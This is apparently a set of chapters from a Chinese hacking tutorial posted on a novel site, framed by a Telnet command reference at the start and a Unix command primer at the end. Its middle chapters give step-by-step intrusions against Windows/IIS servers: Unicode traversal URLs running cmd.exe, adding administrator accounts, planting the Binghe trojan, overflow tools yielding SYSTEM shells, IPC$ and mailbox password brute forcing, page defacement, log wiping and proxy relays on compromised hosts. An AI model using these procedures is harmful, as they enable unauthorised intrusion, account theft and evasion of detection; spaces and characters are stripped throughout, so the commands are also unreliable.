  用它来与一个命名机器连接,要求给出目标机器的名字或IP地址。如果未给出机器名,Telnet就将要你选择一个机器名。必须注意,在使用"Open"命令之前应该先用"close"来关闭任何已经存在的连接。
  SetECHO:
  用于本地的响应是On或是Off。作用是是否把输出的内容显示在屏幕上。和DOS的ECHO基本上是一样。如果机器是处于ECHOON的话,想改变为OFF,那么就可以输入SETECHO
  想再改变回ECHOOFF,那么就再键入SETECHO就可以了。(这儿说的比较简短
  如果有不明白的
  可以与我联系)
  Setescapechar:
  建立"escape"字符到某个特殊的符号,若想用某种控制符号来代替,可以用"asis"或者键入符号"^"加字母b(如:^b)。在正常工作时,是不需要用"escape"这个字符的,并且这个被用作"escape"的符号不应该再被使用。这类似于许多程序中对键盘上的每一个键设定其真正的涵义。但如果正在运行一个daisy-chained应用系统,那么可以重新议定"escape"字符的特征便是很有用的。例如:用Telnet从系统A到系统B,接着又用Telnet注册进入系统C。如果正在系统C上工作时出了故障,那么当"escape"代表符是相同时,就没法中断系统B到系统C的连接。键入"escape"代表符,将总是处于系统A的命令模式。如果在每个Telnet部分使用不同的"escape"代表符,便可以通过键入适当的符号,来选择其中一个命令模式,这也可以用于其他的应用中(像终端仿真)。
  Quit:
  用它可顺利地推出Telnet程序。
  Z:
  用语保留Telnet但暂时回到本地系统执行其他命令。并且在Telnet中的连接以及其他的选择在Telnet恢复时仍被保留。
  CarriageReturn:
  用于不具体的一个命令从命令模式返回到所连接的远程机器上。另外,还有许多其他的命令可以推出命令模式。下面举一个例子,是从注册进入到porky.math.ukans.edu
  然后进入命令模式,然后返回porky::
  telnetporky.math.ukans.edu
  Trying129.237.128.11...
  Connectedtoporky.math.ukans.edu.
  Escapecharacteris'^]'.
  SunOSUNIX(porky)
  login:wl
  password:
  LastLogin:TueMar2805:35fromns.bta.net.cn
  SunOSRelease4.1.3_U1(SLIPPERY1)#3:SunNov2023:47:23CST1999
  Nomatch.
  if:Expressionsyntax.
  porky/serv/wl%cd/
  porky/%CTRL-]
  telnet:?
  Commandsmaybeabbreviated
  Commandare:
  openconnecttoasite
  closeclosecurrectconnection
  quitexittelnet
  displaydisplayoperatingparameters
  sendtransmitspecialcharacters('send?'formore)
  setsetoperatingparameters('set?'formore)
  statusprintstatusinformation
  toggletoggleoperatingparameters('toggle?'formore)
  modetrytoenterline-by-lineorcharacter-at-a-timemode
  ?printhelpinformation
  telnet:setescape^b
  escapecharacteris’^b’
  porky/%logout
  ns.bta.net.cn%
  注意:set命令也可以退出命令模式。当然,如果不行,可以回车输入一空行,也能回到porky。
憂滺书擝 uuTXT.CoM 铨蚊字板阅牍


第二卷 第七章 字数:2243
  ?IIS4.0和IIS5.0在Unicode字符解码的实现中存在的安全漏洞已经成为了黑客们忠爱的漏洞之一,有希望成为2000年最大的漏洞之一。在此向发现此漏洞的中联绿盟成员袁哥及想出利用映射网络盘方法来解决文件上传问题的luandao2000致敬。好了,开工吧!
  首先是要找到一台带有共享盘的肉鸡,然后将其共享盘映射会本地。找带共享盘的主机不是很难,用国产的黑客软件网络刺客就可以了,在网络刺客中“主机资源”菜单里找“扫描共享主机”,然后填写启始ip和结束ip以后按扫描就,去看会儿电视,再回来看看扫描到没有。没扫描到再换个地址试试,扫描到了的话就可以把他用共享资源菜单中的“影射指定网络盘”把他影射为自己主机的任意一个盘上。
  下面的工作就是把工具copy到肉鸡上,假设对方的共享盘为E
  ip为127.1.1.2,我们把它影射到了F盘上。现在我们需要copy
  自己C盘下的gasys.dll、cmd.exe和getadmin.exe到对方的E盘下,可以到DOS下输入:
  C:>copyc:.dllF:
  1file(s)copied.
  C:>copyc:.exeF:
  1file(s)copied.
  C:>copyc:.exeF:
  1file(s)copied.
  至此为止,肉鸡已经搞定了。现在我们要象主目标进行攻击了。假设对方网站的ip是127.1.1.1
  先要把cmd.exe复制到scripts的目录下面,并且要改名,假设对方的物理盘为E:http://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+e:.exe+e:.exe
  这样我们就已经把cmd.exe复制到了scripts的目录下,并改名为hackercn.exe。现在我们要用它把我们肉鸡上的E盘影射为这个网站服务器上的Y盘:http://127.1.1.1/scripts/hackercn.exe?/c+net+use+Y:+\127.1.1.2
  然后把我们copy过去的那3个文件再copy到网站服务器上(cmd.exe虽然刚才已经copy过去了,但因为改了名,所以还要再copy一次):http://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+Y:.dll+d:.dllhttp://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+Y:.exe+d:.exehttp://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+Y:.exe+d:.exe
  好了,现在我们需要把“IUSR_计算机名”这个帐号升级为Administrator(并不是每个站点都有“IUSR_计算机名”这个帐号)。假设这台计算机名为“SERVERS”,那么我们可以这样做:http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS
  这样所有的访问者都有了Administrator限权,然后我们再来新建一个用户名为hacker密码为password的用户:http://127.1.1.1/cgi-bin/cmd.exe?/c%20c:.exe%20user%20hacker%20password%20/add
  然后再把它授予Administrator限权:http://127.1.1.1/scripts/getadmin.exe?hacker
  下来就是进入该系统并制作后门了:
  在nt的dos下输入
  C:>netuse\127.1.1.1$"password"/user:"hacker"
  现在你已经登陆到了他的主机上,然后上传木马冰河:
  C:>copyC:_Server.exe\127.1.1.1$
  然后用nettime来获得对方的时间:
  C:>nettime\127.1.1.1
  假设对方的时间是5点40,那么我们将在5点43启动冰河程序:
  C:>at\127.1.1.105:43G_Server.exe
  这样我们就完整的实现了一次入侵,别忘了最后要打扫战场。用冰河删除我们上传过的东西。在“开始”菜单中的“程序”菜单里用“管理工具”中“域用户管理器”的“菜单用户”里选“选择域”,然后输入127.1.1.1,然后还原我们做过手脚的用户。
  剩下的事就可以用我们植入的冰河来干了。当然,不见得总会那么走运,在入侵中还会碰到最开始copy文件限权不够等等问题,这就需要大家开动脑筋来解决了。祝各位好运!
優悠書萌 UuTxT.com 荃纹吇板粤渎


第二卷 第八章 字数:14255
  ?1)UNICODE漏洞入侵
  “Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。
  第一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。在第一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在第一个框里就填入192.168.0.1,在to后面的框里填入192.168.0.255意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框,是要填入内容的如:
  /scripts/..%c0%af../winnt/system32/cmd.exe
  这句话的意思是扫描有%c0%af漏洞的机器,对象一般是英文的WIN2000机。
  我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了,如果你选的IP范围好,呵,很快在扫描结果框里就会显示扫到的漏洞主机
  如http://192.168.0.111/scripts/..%c0%...ystem32/cmd.exe
  意思是192.168.0.111主机有%c0%af漏洞,
  目标有了,我们马上打开浏览器。在网址栏里输入:
  http://192.168.0.111/scripts/..%c0%....exe?/c+dir+c:\回车
  意思是查看机器里C盘的根目录。一般情况下,我们都可以在浏览器里看到类似如:
  Directoryofc:2002-03-1303:47p289default.asp
  2002-02-1103:47p289default.htm
  2002-03-0904:35pDocumentsandSettings
  2002-02-1103:47p289index.asp
  2002-02-1103:47p289index.htm
  2002-05-0805:19aInetpub
  2002-01-1910:37pMSSQL7
  2002-03-0904:22pProgramFiles
  2002-01-2306:21pWINNT
  4File(s)1
  156bytes
  5Dir(s)2
  461
  421
  568bytesfree
  ------------------------------
  的目录列表。也会碰到看不到文件的空目录。
  好,我们成功看到了机器里的C盘了。
  我们在浏览器里输入:
  http://192.168.0.111/scripts/..%c0%.../cmd.exe?/c+set回车
  CGIError
  ThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:
  ALLUSERSPROFILE=C:\DocumentsandSettings\AllUsers
  CommonProgramFiles=C:\ProgramFiles\CommonFiles
  COMPUTERNAME=ON
  ComSpec=C:\WINNT\system32\cmd.exe
  CONTENT_LENGTH=0
  GATEWAY_INTERFACE=CGI/1.1
  HTTP_ACCEPT=image/gif
  image/x-xbitmap
  image/jpeg
  image/pjpeg
  */*
  HTTP_ACCEPT_LANGUAGE=zh-cn
  HTTP_CONNECTION=Keep-Alive
  HTTP_HOST=192.168.0.111
  HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE6.0b;Windows98;Win9x4.90)
  HTTP_ACCEPT_ENCODING=gzip
  deflate
  HTTPS=off
  INSTANCE_ID=1
  LOCAL_ADDR=192.168.0.111
  NUMBER_OF_PROCESSORS=1
  Os2LibPath=C:\WINNT\system32\os2\dll;
  OS=Windows_NT
  Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
  PATH_TRANSLATED=c:\inetpub\wwwroot
  PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
  PROCESSOR_ARCHITECTURE=x86
  PROCESSOR_IDENTIFIER=x86Fa
  -----------------
  哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot
  意思是他的主页存放在c:\inetpub\wwwroot的目录里,知道就好办了。
  我们用命令:
  http://192.168.0.111/scripts/..%c0%...pub\wwwroot回车
  我们就可以看到c:\inetpub\wwwroot目录里的文件了,一般都有default.asp
  default.htm
  index.htm
  index.asp
  等等。我们以目录里有index.asp做例子。
  我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。
  我们用命令:
  http://192.168.0.111/scripts/..%c0%...wroot\index.asp回车
  当看到下面的英文
  CGIError
  ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete
  setofHTTPheaders.Theheadersitdidreturnare:
  恭喜你,你可以改他的网页了。
  ----------------------------------------
  但如果你看到下面的英文就不成功,只好换其他机器了。
  CGIError
  ThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:
  Accessdenied-C:\inetpub\wwwroot\index.asp
  -----------------------------
  继续。现在用ECHO改网页的内容。
  http://192.168.0111/scripts/..%c0%a...nt/system32/cmd".exe?/c+echo+网站有漏洞+>c:\inetpub\wwwroot\index.asp回车
  当看到
  CGIError
  ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete
  setofHTTPheaders.Theheadersitdidreturnare:
  的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。
  英文WIN2000
  /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:中文WIN2000
  /scripts/..%c0%2f../winnt/system32/cmd.exe
  /scripts/..%c1%1c../winnt/system32/cmd.exe
  WINNT4
  /scripts/..%c1%9c../winnt/system32/cmd.exe
  英文WIN2000
  /scripts/..%c0%af../winnt/system32/cmd.exe
  通用代码:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:
  (2)Windows2000输入法漏洞
  先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。选择“帮助”——“输入法指南”——“选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入:c:\winnt\system32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性”—“目标”—c:\winnt\system32\net.exe后面空一格,填入“userguest/active:yes”。点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)然后重复操作上面的,在“属性”——“目标”——c:\winnt\system32\net.exe后面空一格,填入localgroupadministratorsguest/add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。现在,我们可以像操作本地主机一样,控制对方系统。
  (3)idq溢出漏洞
  要用到3个程序,一个SnakeIISIDQ溢出程序GUI版本,一个扫描器,还有NC。
  首先扫描一台有IDQ漏洞的机器,然后设置SnakeIISIDQ溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5EnglishWin2kSp0吧,点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了,然后我们用NC来连接。
  进入MS-DOS。进入“nc”的目录。然后:nc--vIP813
  c:\>nc-vvIP813
  IP:inversehostlookupfailed:h_errno11004:NO_DATA
  (UNKNOWN)[IP]813(?):connectionrefused
  sent0
  rcvd0:NOTSOCK
  c:\>
  看来没成功.别灰心,在来一次,换用IIS5EnglishWin2kSp1试试。
  c:\>nc-vvIP813
  IP:inversehostlookupfailed:h_errno11004:NO_DATA
  (UNKNOWN)[IP]813(?)open
  MicrosoftWindows2000[Version5.00.2195]
  (C)Copyright1985-2000MicrosoftCorp.
  C:\WINNT\system32>
  哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。
  (4)IDA溢出漏洞
  所用程序:idahack
  进入MS-DOS方式(假设idq.exe在c:\下)
  c:\idahack.exe
  运行参数:c:\idahack
  chinesewin2k:1
  chinesewin2ksp1:2
  chinesewin2ksp2:3
  englishwin2k:4
  englishwin2ksp1:5
  englishwin2ksp2:6
  japanesewin2k:7
  japanesewin2ksp1:8
  japanesewin2ksp2:9
  koreawin2k:10
  koreawin2ksp1:11
  koreawin2ksp2:12
  chinesentsp5:13
  chinesentsp6:14
  c:\idahack127.0.0.180180
  connecting...
  sending...
  Nowyoucantelnetto80port
  Goodluck?
  好,现在你可以telnet它的80端口了,我们用NC来连接。
  C:\nc127.0.0.180
  MicrosoftWindows2000[Version5.00.2195]
  (C)版权所有1985-1998MicrosoftCorp
  C:\WINNT\system32>
  OK,现在我们现在上来了,也可IDQ一样是SYSTEN权限,尽情的玩吧。
  (5).printer漏洞
  这个漏洞,我们用两个程序来入侵。iis5hack和nc。
  C:\>iis5hack
  iis5remote.printeroverflow.writenbysunx
  http://www.sunx.org
  fortestonly
  dontusedtohack
  usage:D:\IIS5HACK.EXE
  用法:D:\IIS5HACK
  chineseedition:0
  chineseedition
  sp1:1
  englishedition:2
  englishedition
  sp1:3
  japaneseedition:4
  japaneseedition
  sp1:5
  koreaedition:6
  koreaedition
  sp1:7
  mexicoedition:8
  mexicoedition
  sp1:9
  c:\>iis5hack127.0.0.19801119
  iis5remote.printeroverflow.writenbysunx
  http://www.sunx.org
  fortestonly
  dontusedtohack
  Listn:80
  connecting...
  sending...
  Nowyoucantelnetto3739port
  goodluck
  溢出成功!
  c:\>nc127.0.0.19119
  http://www.sunx.org
  MicrosoftWindows2000[Version5.00.2195]
  (C)版权所有1985-2000MicrosoftCorp.
  C:\WINNT\system32>
  OK,我们又成功取得system权限!玩吧。
  (6)139端口入侵
  我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat-aIP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。
  用到两个NET命令,下面就是这两个命令的使用方法
  NETVIEW?
  作用:显示域列表、计算机列表或指定计算机的共享资源列表。?
  命令格式:netview[\\computername|/domain[:domainname]]?
  参数介绍:?
  键入不带参数的netview显示当前域的计算机列表。?
  \\computername指定要查看其共享资源的计算机。?
  /domain[:domainname]指定要查看其可用计算机的域?
  NETUSE?
  作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。?
  命令格式:netuse[devicename|*][\\computername\sharename[\volume]]?
  [password|*]][/user:[domainname\]username][[/delete]|?
  [/persistent:{yes|no}]]?
  参数介绍:?
  键入不带参数的netuse列出网络连接。?
  devicename指定要连接到的资源名称或要断开的设备名称。?
  \\computername\sharename服务器及共享资源的名称。?
  password访问共享资源的密码。?
  *提示键入密码。/user指定进行连接的另外一个用户。?
  domainname指定另一个域。?
  username指定登录的用户名。?
  /home将用户连接到其宿主目录?
  /delete取消指定网络连接。?
  /persistent控制永久网络连接的使用。?
  C:\netuse\\IP
  C:\netview\\IP
  我们已经看到对方共享了他的C,D,E三个盘
  我们要做的是使用NBTSTAT命令载入NBT快取.
  c:\>nbtstat–R载入NBT快取
  c:\>nbtstat–c看有无载入NBT快取
  现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。
  (7)IPC入侵
  所有程序:流光
  开始:在主界面选择探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。输入我们要破解的IP段,我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度:)填入IP,选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”前面打勾
  然后在菜单了选“探测”,,扫描出结果以后,“IPC$主机”,选中后按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测”
  的窗体,把那两个选项都选了,然后点“选项”为了加快弱口令扫描速度,这里的两个选项我们可以全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿,结果出来了。比如我们探测出了用户名为“admin”的管理员,密码为“admin”,现在我们用命令提示符,熟悉下命令吧,输入:
  netusefile://对方ip/ipc$"密码"/user:"用户名"||建立远程连接
  copyicmd.exefile://对方ip/admin$||admin$是对方的winnt目录
  nettimefile://对方IP/||看看对方的本地时间
  atfile://对方ip/启动程序的时间启动程序名启动程序的参数||用at命令来定时启动程序
  telnet对方ip端口
  我们也可以改网页:
  netuse\\ip\ipc$"admin"/uesr:"admin"回车。
  出现“命令成功完成”。
  然后输入“dir\\ip\c$\*.*”
  看到C:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面
  输入“dir\\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或default.asp.这些就是主页了,假如你黑页在C:下,就输入"copy主页文件\\ip\c$\inetpub\wwwroot"覆盖原文件这样就行了,简单吧?
  日志清除,断开连接:
  我们copycl.exe,clear.exe上去,再执行,就可以清除日志,比如clearall:清除所有的日志。然后在断开连接:netusefile://ip/ipc$/delete
  (8)超管SA空密码漏洞
  使用的工具:流光IV
  启动流光,按Ctrl+R。出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。点击“确定”,进行扫描,假设我们取得主机:127.0.0.1,然后点击“工具”——SQL远程命令(或者Ctrl+Q),填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接”,出现远程命令行的界面。
  netuserheiyingheiying1/add填加一个heiying的帐号和密码heiying1
  netlocalgroupadministratorsheiying/add将我们创建的heiying帐号填加到管理组。
  下面我们来做跳板:
  打开cmd.exe
  输入netuse\\127.0.0.1\ipc$"heiying1"/user:"heiying"命令
  显示命令成功完成。
  上传srv.exe:
  copysrv.exe\\127.0.0.1\admin$\system32
  上传ntlm.exe:
  copyntlm.exe\\127.0.0.1\admin$\system32
  启动服务:
  首先用nettime\\127.0.0.1
  看看对方主机的时间
  (假如回显\\127.0.0.1的本地时间是上午12.00),然后我们用at\\2127.0.0.112.01srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。
  一分钟后在本机命令提示符中输入:
  telnetX.X.X.X99
  然后我们要启动NTLM.exe:
  在telnet状态下直接输入ntlm回车。
  显示:windows2000telnetdump
  byassassin
  allrightsreserved.done!
  然后从新启动对方主机的telnet服务:netstoptelnet(先关闭telnet服务)再输入netstarttelnet(启动telnet服务)然后我们退出telnet,然后在命令行下输入telnet127.0.0.1
  依照提示
  接着输入用户名:heiying
  密码:heiying1,回车。这样
  我们的跳板就做好了,简单吧?
  (上面上传的srv和ntlm等东东还有一个简便方法,全都可以直接用流光工具菜单里的种植者上传,60秒后自动运行,不用敲命令!呵呵~~~~方便吧!)
  (9)如何用流光破解信箱密码
  这次的目标是21CN,运行流光IV,选择POP3主机----右键----编辑----添加,填上:pop.21cn.com,其他的就用默认吧!不用更改,确定就行了。到下一步,还是右键-----从列表中添加------选择一个字典,没有的到网上下载一个字典,或者到黑白网络去下载,我们用简单模式探测!这样速度比较快,然后就等着成果吧,上次我以下就破了5个邮箱出来。
  (10)frontpage进行攻击
  打开您自己的Frontpage,文件菜单下选择“打开站点”,然后在文件夹框里写入
  http://127.0.0.1
  注意:(http://不要漏掉)。
  按下“打开”按钮,一会后,出现了文件夹,成功了,现在就可以操作网页文件了。如果跳出错误信息,表示有密码,我们用以下
  http://127.0.0.1/_vti_pvt/service.pwd,
  这是默认的密码文件,下载下来,找个解密器破密码吧!破出来后就还可以改网页。这个只能改该网页,没什么玩的。
  (11)用肉鸡做SOCK5代理跳板
  需要软件:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。
  首先我们在命令提示符下建立IPC$管道:
  netuse\\127.0.0.1\ipc$"密码"/user:帐号
  通道建立好后,我们把srv.exesss.exentlm.exe全部上传。
  c:\copysrv.exe\\10.10.10.10\admin$
  1filescopied!
  c:\copyntlm.exe\\10.10.10.10\admin$
  1filescopied!
  c:\copysss.exe\\10.10.10.10\admin$
  1filescopied!
  复制完毕后,
  看肉鸡上现在的时间:
  c:\nettime\\127.0.0.1
  显示当前时间是2002/4/13晚上09:00
  我们来启动srv.exe
  c:\at\\127.0.0.109:01srv.exe
  等到09:01后。我们来连接肉鸡:
  c:\telnet127.0.0.199
  连上后显示:
  c:\winnt\system32>
  接着我们启动NTLM.exe
  c:\winnt\system32>ntlm
  显示:
  Windows2000TelnetDump
  byAssassin
  AllRightsReserved.
  Done!
  C:\WINNT\system32>
  首先我们终止srv.exe的telnet服务:
  C:\WINNT\system32>netstoptelnet
  继续:
  C:\WINNT\system32>netstarttelnet
  再启动TELNET。
  OK,我们来登陆
  c:>telnet127.0.0.1
  *==========================================================
  MicrosoftTelnet
  *==========================================================
  c:>
  好了,一切顺利,我们现在正式开始做代理:
  c:>sss.exe-install
  显示:
  c:>sksockserverinstalled!
  来看看配置:
  c:>sss-configshow
  显示:
  SkServerPort=1813
  我们记着这个1813端口哦
  SkServerStartType:3-Manual
  SkServerEnableClientSetNum:0
  SkServerPassSkServerNumber:0
  来启动服务:
  c:>netstartskserver
  提示你正在启动,并且完成。
  来检查一下是不是启动了:
  c:>netstart
  TheseWindows2000servicesarestarted:
  PrintSpooler
  Server
  SnakeSockProxyService
  SystemEventNotification
  TCP/IPNetBIOSHelperService
  Telephony
  Telnet
  Thecommandcompletedsuccessfully.
  c:>_
  好了,到这里我们已经做好了一个socks5代理了,我们自己的哦.OK,下面我们用sockscap来使用我们做代理。
  安装好SocksCap后,我们在桌面上打开SocksCapV2,点开File选项选Settings...弹出卡片,在SOCKSServer里面我们填肉鸡的IP:127.0.0.1,PortT填默认的1813端口,下面的我们选socksversion5,呵呵,和Attemptlocalthenremot
  这是域名解析的顺序,先本地,然后才远程。设置完了点“确定”我们就可以使用了,添加应用程序到sockscap里面,点开那个"new"按钮,会弹出一个卡片,
  Profilename:程序名,随便写。
  CommandLine:命令行,点后面的Browse...找到你的程序路径
  Working:填好上面那个,这个就自动加上.
  这样我们就把程序加到SocksCap里面了。
  现在们可以双击里面的程序来使用,也可以选住程序在点"Run"来运行。
u憂書盟 UutXT.COM 诠纹吇扳粤镀


第二卷 第九章 字数:13703
  ?以下只说明各指令的基本用法
  若需详细说明
  请用man去读详细的manual.
  1.ls
  这是最基本的档案指令。ls的意义为"list",也就是将某一个目录或是某一个档案的内容显示出来。如果你在下ls指令後头没有跟著任何的档名,它将会显示出目前目录中所有档案。也可以在ls後面加上所要察看的目录名称或档案的名称,如
  %ls/etc
  ls有一些特别的参数,可以给予使用者更多有关的资讯,如下:
  -a:在UNIX中若一个目录或档案名字的第一个字元为"."
  则使用ls
  将不会显示出这个档案的名字,我们称此类档案为隐藏档。如tcsh的初设档.tcshrc;如果我们要察看这类档案,则必须加上参数-a。
  -l:这个参数代表使用ls的长(long)格式,可以显示更多的资讯,如档案存取权,档案拥有者(owner),档案大小,档案最後更新日期,甚而symboliclink的档案是link那一个档等等。如下
  %ls-l
  2.cp
  cp这个指令的意义是复制("COPY")
  也就是将一个或多个档案复制成另一个档案或者是将其复制到另一个目录去。
  -i:此参数是当已有档名为f2的档案时,若迳自使用cp将会将原来f2
  的内容掩盖过去,因此在要盖过之前必须先询问使用者一下。如使用者
  的回答是y(yes)才执行复制的动作。
  -r:此参数是用来做递回复制用,可将一整颗子树都复制到另一个
  目录中。
  3.mv
  mv的意义为move
  主要是将一档案改名或换至另一个目录。如同cp,它也有三种格式:
  mv的参数有两个,-f和-i
  其中-i的意义与cp中的相同,均是interactive
  询问之意。而-f为强迫(force)
  就是不管有没有同名的档案,反正我就是要
  搬过去,所有其他的参数遇到-f均会失效
  4.rm
  rm的意义是remove,也就是用来杀掉一个档案的指令。在UNIX中一
  个被杀掉的档案除非是系统恰好有做备份,否则是无法像DOS里面一样还能够救回
  来的。所以在做rm动作的时候使用者应该要特别小心。
  -f:将会使得系统在删除时,不提出任何警告讯息。
  -i:在除去档案之前均会询问是否真要除去。
  -r:递回式的删除。
  5.mkdir
  mkdir是一个让使用者建立一个目录的指令。你可以在一个目录底下使用
  midir建立一个子目录,使用的方法就不用多说了吧!
  6.chdir(cd)
  这是让使用者用来转移工作目录用的。
  chdirdirname
  如此你就可以将目前的目录转移到dirname这一个目录去。或使用"chdir.."来转移到上一层目录。
  7.rmdir
  相对於mkdir,rmdir是用来将一个"空的"目录杀掉的。如果一个目录下面没有任何档案,你就可以用rmdir指令将其除去。rmdir的使用法如下:
  rmdirdirname1[dirname2....]
  如果一个目录底下有其他的档案,rmdir将无法将这个目录杀掉,除非使用rm指令的-r选项。
  8.pwd
  pwd会将目前目录的路径(path)显示出来,例如:
  9.cat/more/less
  以上三个指令均为察看档案内容的指令。cat的意义是猫....不不不,是concatenate,在字典上的意思是"连结
  将…串成锁状"(语出资工电子词典cdict),其实就是把档案的内容显示出来的意思。cat有许多奇怪的参数,较常为人所使用的是-n参数,也就是把显示出来的内容加上行号。cat的用法如下:
  cat[-n]:自标准输入读进内容,你可以用pipe将别的程式的输出转向
  给cat.
  cat[-n]filename:将filename的内容读进来,显示在标准输出上。问题在於cat它是不会停下来的,因此并不好用(试想如果一个萤幕二十四行,而一个档案四百行,cat一出来将会劈哩啪啦不断的卷上去,使用者很难据此得到他们所需的资讯。)所以才有人又写了more出来。
  more
  可以将所观察的档案跟据终端机的形态一页页的显示出来,再根据使用者的要求换页或卷行。如果使用者要在某一个档案中搜寻一个特定的字串,则按/然後跟著打所要搜寻的单字即可进行搜寻。more也可以找得到。more的使用法如下:
  morefilename
  如果你在使用中觉得已经看到了所要看的部份,可以按'q'离开more的使用。在使用中按'v'亦可以使用编辑器来编辑所观看的档案。less的用法与more极类似,原先它就是为了弥补more只能往前方卷页的缺点而设计。less的用法如下:
  lessfilename
  其与more不同的是它可以按y来往上卷一行,并且可以用"?"来往回搜寻你所要找的单字。
  10.chmod
  chmod为变更档案模式用(changemode).这个指令是用来更改档案的存取模式(accessmode)。在UNIX一个档案上有可读(r)可写(w)可执行(x)三种模式
  分别针对该档案的拥有者(onwer)、同群者(groupmember)(你可以ls-lg来观看某一档案的所属的group),以及其他人(other)。一个档案如果改成可执行模式则系统就将其视为一个可执行档,而一个目录的可执行模式代表使用者有进入该目录之权利。chmod就是用来变更一些档案的模式,其使用方式如下:
  chmod[-fR]modefilename...
  其参数的意义如下:
  -fForce.chmod不会理会失败的动作。
  -RRecurive.会将所有子树下的所有子目录及档案改为你所要改成的模式。
  mode可以为一个三位或四位的八进位数字,来表示对某些对象的存取权。详情可参阅chmod(1)的manualpage中有关AbsoluteModes的说明。或是用一个字串来表示,请参考chmod(1)的说明。
  二.关於Process处理的指令:
  1.ps
  ps是用来显示目前你的process或系统processes的状况。
  以下列出比较常用的参数:
  其选项说明如下:
  -a列出包括其他users的process状况。
  -u显示user-oriented的process状况。
  -x显示包括没有terminal控制的process状况。
  -w使用较宽的显示模式来显示process状况。
  我们可以经由ps取得目前processes的状况,如pid
  runningstate等。
  2.kill
  kill指令的用途是送一个signal给某一个process。因为大部份送的都是
  用来杀掉process的SIGKILL或SIGHUP,因此称为kill。kill的用法
  为:
  kill[-SIGNAL]pid...
  kill-l
  SIGNAL为一个singal的数字,从0到31,其中9是SIGKILL,也就是一
  般用来杀掉一些无法正常terminate的讯号。其馀讯号的用途可参考sigvec(2)
  中对signal的说明。
  你也可以用kill-l来察看可代替signal号码的数目字。kill的详细情形
  请参阅mankill。
  三.关於字串处理的指令:
  1.echo
  echo是用来显示一字串在终端机上。□echo-n则是当显示完之後不会有跳行的动作。
  2.grep/fgrep
  grep为一过滤器,它可自一个或多个档案中过滤出具有某个字串的行,或是
  自标准输入过滤出具有某个字串的行。
  fgrep可将欲过滤的一群字串放在某一个档案中,然後使用fgrep将包含有
  属於这一群字串的行过滤出来。
  grep与fgrep的用法如下:
  grep[-nv]match_patternfile1file2....
  fgrep[-nv]-fpattern_filefile1file2....
  -n把所找到的行在行前加上行号列出
  -v把不包含match_pattern的行列出
  match_pattern所要搜寻的字串
  -f以pattern_file存放所要搜寻的字串
  四.网路上查询状况的指令:
  1.man
  man是手册(manual)的意思。UNIX提供线上辅助(on-linehelp)的功能,
  man就是用来让使用者在使用时查询指令、系统呼叫、标准程式库函式、各种表
  格等的使用所用的。man的用法如下:
  man[-Mpath][[section]title].....
  man[-Mpath]-kkeyword...
  -Mpathman所需要的manualdatabase的路径。
